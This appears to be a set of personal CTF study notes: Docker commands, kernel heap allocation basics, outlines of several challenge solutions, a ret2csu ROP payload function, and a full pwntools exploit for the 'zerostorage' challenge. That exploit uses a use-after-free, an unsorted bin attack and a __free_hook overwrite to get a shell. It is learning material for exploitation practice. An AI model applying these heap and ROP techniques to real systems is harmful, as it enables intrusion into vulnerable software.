docker run -it --name "desired name" "desired image" /bin/bash

Docker: run a container you have already created again
docker restart 'container name'
docker attach 'container name'

Docker cp
host -> container
docker cp [host file path] [container name]:[path inside container]
container -> host
docker cp [container name]:[path inside container] [host file path]

Docker: view running processes...
Kernel UAF

Heap allocation in the kernel: the kernel allocates and frees heap memory in the kernel area through kmalloc() and kfree().

kmalloc
void *kmalloc(size_t size, gfp_t flags);
The first argument is the allocation size; the second is the type of memory to allocate. GFP_KERNEL is the flag normally used to allocate kernel memory.
https://www.kernel.org/doc/htmldocs/kernel-api/API-kmalloc.html

kfree
void kfree(const void *objp);
Pass the pointer returned by kmalloc to free the memory.
https://github.com/genodelabs/linux_drivers/blob/master/src/lib/dde_linux26/arch/dde_kit/kmalloc.c

Kernel UAF (CISCN2017 babydriver)...
Pwnable.tw break_out
Use the punish function to free the heap structure
UAF on the freed region through the note function
The note address is controllable
Create an unsorted bin through realloc and leak libc
house of orange
get shell
Ret2csu
def csu(rbx, rbp, r12, r13, r14, r15, last):
    # Gadget 1 (csu_end): pop rbx, rbp, r12, r13, r14, r15; ret
    # rbx should be 0 (index into [r12 + rbx*8])
    # rbp should be 1, so that after add rbx,1 the cmp rbp,rbx matches and no jump back is taken
    # r12 should point to the function pointer to call (call [r12 + rbx*8]), e.g. a GOT entry
    # Gadget 2 (csu_front): mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
    # rdi = edi = r15d
    # rsi = r14
    # rdx = r13
    # fakeebp, csu_end_addr and csu_front_addr are binary-specific values set outside this function
    payload = 'a' * 0x80 + fakeebp
    payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front_addr)
    # after the call, gadget 1 runs again: add rsp,8 plus six pops = 0x38 bytes of padding
    payload += 'a' * 0x38
    # return address reached by the final ret
    payload += p64(last)
    return payload
Zerostorage
The vulnerability is in merge: an entry can be merged with itself (UAF)
Overwrite global_max_fast with an unsorted bin attack (every chunk smaller than the value in global_max_fast can then be used like a fastbin chunk)
Overwrite __free_hook and exploit
# Python 2 / pwntools exploit (str payloads)
from pwn import *

def insert(length, data):
    sla(':', '1')
    sla(':', str(length))
    sa(':', data)

def update(idx, length, data):
    sla(':', '2')
    sla(':', str(idx))      # restored: index of the entry to update
    sla(':', str(length))   # restored: new length
    sa(':', data)

def merge(idx1, idx2):
    sla(':', '3')
    sla(':', str(idx1))
    sla(':', str(idx2))

def delete(idx):
    sla(':', '4')
    sla(':', str(idx))

def view(idx):
    sla(':', '5')
    sla(':', str(idx))

def list_all():   # renamed from list() so it does not shadow the builtin
    sla(':', '6')

r = process('./zerostorage')
e = ELF('./zerostorage')
libc = e.libc

sla = lambda x, y: r.sendlineafter(x, y)
sa = lambda x, y: r.sendafter(x, y)
ru = lambda x: r.recvuntil(x)

insert(0x40, 'A' * 0x40)    # 0
insert(0xf8, 'B' * 0xf8)    # 1
merge(0, 0)                 # 2: merging an entry with itself -> UAF
view(2)
ru('Entry No.2:\n')
libc_leak = u64(ru('\x7f') + '\x00\x00') - 0x3c4b78
log.info(hex(libc_leak))

# global_max_fast edit (unsorted bin attack)
global_max_fast = libc_leak + 0x3c67f8
log.info('Global_max_fast : ' + hex(global_max_fast))
update(2, 0x20, p64(0xdeadbeef) + p64(global_max_fast - 0x10) + 'A' * 0x10)
insert(0x10, '/bin/sh\x00' + '\x00' * 0x8)   # 0
'''
0x7faab01147e8 <free_list>:                 0x00000000 0x00000000 0x00000000 0x00000000
0x7faab01147f8 <global_max_fast>:           0xb0112b78 0x00007faa 0x00000000 0x00000000
0x7faab0114808 <root>:                      0x00000000 0x00000000 0x00000000 0x00000000
0x7faab0114818 <old_realloc_hook>:          0x00000000 0x00000000 0x00000000 0x00000000
0x7faab0114828 <old_malloc_hook>:           0x00000000 0x00000000 0x00000000 0x00000000
0x7faab0114838 <added_atexit_handler.9387>: 0x00000000 0x00000000 0x00000000 0x00000000
'''
#update(2,0x20,p64(libc_leak+0x3c4b78)*2+'A'*0x10)
merge(1, 1)   # 3
free_hook = libc_leak + libc.symbols['__free_hook']
oneshot = libc_leak + libc.symbols['system']
log.info(hex(free_hook))
log.info(hex(oneshot))
'''
0x7fb2faf3574f:                         0x00000000 0x00000000 0x00000200 0x00000000
0x7fb2faf3575f:                         0x00000000 0x00000000 0x00000000 0x00000000
0x7fb2faf3576f <list_all_lock+15>:      0x00000000 0x00000000 0x00000000 0x00000000
0x7fb2faf3577f <_IO_stdfile_2_lock+15>: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fb2faf3578f <_IO_stdfile_1_lock+15>: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fb2faf3579f <_IO_stdfile_0_lock+15>: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fb2faf357af <__free_hook+7>:         0x00000000 0x00000000 0x00000000 0x00000000
'''
update(3, 0x1f8, p64(free_hook - 0x59) + p64(0xdeadbeef) + 'A' * (0x1f8 - 0x10))
insert(0x1f8, p64(free_hook - 0x59) + '\x00' * (0x1f8 - 0x8))
insert(0x1f8, '\x00' * 0x49 + p64(oneshot) + '\x00' * (0x1f8 - (0x49 + 8)))
delete(0)
r.interactive()